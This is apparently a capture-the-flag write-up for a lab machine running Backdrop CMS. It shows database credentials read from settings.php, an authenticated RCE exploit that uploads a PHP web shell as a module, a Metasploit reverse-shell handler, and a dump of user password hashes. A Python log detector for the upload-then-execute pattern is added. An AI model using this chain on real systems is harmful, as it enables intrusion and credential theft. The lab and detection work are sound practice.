Foothold

❯ ls
core  files  index.php  layouts  LICENSE.txt  README.md  robots.txt  settings.php  sites  themes
❯ cat settings.php
<?php
/**
 * @file
 * Main Backdrop CMS configuration file.
 */

/**
 * Database configuration:
 *
 * Most sites can configure their database by entering the connection string
 * below. If using primary/replica databases or multiple connections, see the
 * advanced database documentation at
 * https://api.backdropcms.org/database-configuration
 */
$database = 'mysql://root:[email protected]/backdrop';
$database_prefix = '';

We need a username

[email protected]:BackDropJ2024DS2024
❯ searchsploit -m 52021
  Exploit: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
      URL: https://www.exploit-db.com/exploits/52021
     Path: /usr/share/exploitdb/exploits/php/webapps/52021.py
    Codes: N/A
 Verified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/adot/htb/dog/52021.py
❯ python 52021.py http://dog.htb
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://dog.htb/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://dog.htb/modules/shell/shell.php
❯ tar -czvf shell.tar shell
shell/
shell/shell.info
shell/shell.php

Visit http://dog.htb/modules/shell/shell.php
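From the defender's side, the chain above leaves a distinctive trace in the web server log: an authenticated POST to the manual module installer at /admin/modules/install, followed by direct requests to a PHP file under /modules/<name>/. The detector below is an added example, not part of the original writeup or of Backdrop CMS; it runs over constructed Apache combined-format log lines and the path names are assumptions modelled on the transcript.

```python
import re

# Constructed sample access-log lines (not from the page or the target). They
# model the install-then-execute sequence: a POST to the module installer,
# then hits on a PHP file inside a freshly uploaded module. The last two lines
# are benign noise from another client.
SAMPLE_LOG = """\
10.10.14.3 - - [10/Jun/2025:12:00:01 +0000] "GET /admin/modules/install HTTP/1.1" 200 5120
10.10.14.3 - - [10/Jun/2025:12:00:09 +0000] "POST /admin/modules/install HTTP/1.1" 302 0
10.10.14.3 - - [10/Jun/2025:12:00:20 +0000] "GET /modules/shell/shell.php HTTP/1.1" 200 83
10.10.14.3 - - [10/Jun/2025:12:00:31 +0000] "GET /modules/shell/shell.php?cmd=id HTTP/1.1" 200 54
10.10.14.7 - - [10/Jun/2025:12:05:00 +0000] "GET /modules/views/js/views.js HTTP/1.1" 200 9000
10.10.14.7 - - [10/Jun/2025:12:06:00 +0000] "GET /index.php HTTP/1.1" 200 2200
"""

# Apache combined-format line: client IP, timestamp, request line, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
INSTALL_PATH = "/admin/modules/install"      # Backdrop manual module installer
# A PHP file requested directly inside /modules/<module>/ (with or without a query string).
MODULE_PHP_RE = re.compile(r"^/modules/([^/]+)/[^?]*\.php(\?|$)")


def parse(line):
    """Split one log line into its fields, or return None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_module_upload_shells(log_text):
    """Return [(ip, module, path)] for PHP files under /modules/<module>/ requested
    directly by a client that earlier POSTed to the module installer.
    Module code is normally reached through index.php, so a direct hit on a PHP
    file in a just-installed module is the signal worth alerting on."""
    installers = set()   # client IPs that uploaded a module
    hits, seen = [], set()
    for raw in log_text.splitlines():
        rec = parse(raw)
        if not rec:
            continue
        if rec["method"] == "POST" and rec["path"].split("?")[0] == INSTALL_PATH:
            installers.add(rec["ip"])
            continue
        m = MODULE_PHP_RE.match(rec["path"])
        if m and rec["ip"] in installers:
            key = (rec["ip"], m.group(1), rec["path"].split("?")[0])
            if key not in seen:       # report each (client, module, file) once
                seen.add(key)
                hits.append(key)
    return hits
```

Run over the sample, it reports the single uploader-then-executor pair and ignores the benign requests to core module assets.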

❯ msfconsole -q -x 'use exploit/multi/handler;set LHOST tun0; set LPORT 443; run'
[*] Using configured payload generic/shell_reverse_tcp
LHOST => tun0
LPORT => 443
[*] Started reverse TCP handler on 10.10.14.3:443
www-data@dog:/var/www/html$ grep bash /etc/passwd
grep bash /etc/passwd
root:x:0:0:root:/root:/bin/bash
jobert:x:1000:1000:jobert:/home/jobert:/bin/bash
johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| backdrop           |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.01 sec)

mysql> use backdrop;
use backdrop;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_backdrop          |
+-----------------------------+
| batch                       |
| cache                       |
| cache_admin_bar             |
| field_revision_comment_body |
| field_revision_field_image  |
<SNIP>
| taxonomy_term_hierarchy     |
| tempstore                   |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| watchdog                    |
+-----------------------------+
59 rows in set (0.00 sec)

mysql> select * from users;
select * from users;
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+------------+------------+------------+--------+----------+----------+---------+----------------------------+------------+
| uid | name              | pass                                                    | mail                       | signature | signature_format | created    | changed    | access     | login      | status | timezone | language | picture | init                       | data       |
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+------------+------------+------------+--------+----------+----------+---------+----------------------------+------------+
|   0 |                   |                                                         |                            |           | NULL             |          0 |          0 |          0 |          0 |      0 | NULL     |          |       0 |                            | NULL       |
|   1 | jPAdminB          | $S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T./ffdEr/. | [email protected]           |           | NULL             | 1720548614 | 1720584122 | 1720714603 | 1720584166 |      1 | UTC      |          |       0 | [email protected]           | 0x623A303B |
|   2 | jobert            | $S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 | [email protected]             |           | NULL             | 1720584462 | 1720584462 | 1720632982 | 1720632780 |      1 | UTC      |          |       0 | [email protected]             | NULL       |
|   3 | dogBackDropSystem | $S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD | [email protected] |           | NULL             | 1720632880 | 1720632880 | 1723752097 | 1723751569 |      1 | UTC      |          |       0 | [email protected] | NULL       |
|   5 | john              | $S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji. | [email protected]               |           | NULL             | 1720632910 | 1720632910 |          0 |          0 |      1 | UTC      |          |       0 | [email protected]               | NULL       |
|   6 | morris            | $S$E8OFpwBUqy/xCmMXMqFp3vyz1dJBifxgwNRMKktogL7VVk7yuulS | [email protected]             |           | NULL             | 1720632931 | 1720632931 |          0 |          0 |      1 | UTC      |          |       0 | [email protected]             | NULL       |
|   7 | axel              | $S$E/DHqfjBWPDLnkOP5auHhHDxF4U.sAJWiODjaumzxQYME6jeo9qV | [email protected]               |           | NULL             | 1720632952 | 1720632952 |          0 |          0 |      1 | UTC      |          |       0 | [email protected]               | NULL       |
|   8 | rosa              | $S$EsV26QVPbF.s0UndNPeNCxYEP/0z2O.2eLUNdKW/xYhg2.lsEcDT | [email protected]               |           | NULL             | 1720632982 | 1720632982 |          0 |          0 |      1 | UTC      |          |       0 | [email protected]               | NULL       |
|  10 | tiffany           | $S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v | [email protected]            |           | NULL             | 1723752136 | 1723752136 | 1749273564 | 1749272404 |      1 | UTC      |          |       0 | [email protected]            | NULL       |
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+------------+------------+------------+--------+----------+----------+---------+----------------------------+------------+
9 rows in set (0.00 sec)

SQL enum led nowhere lol
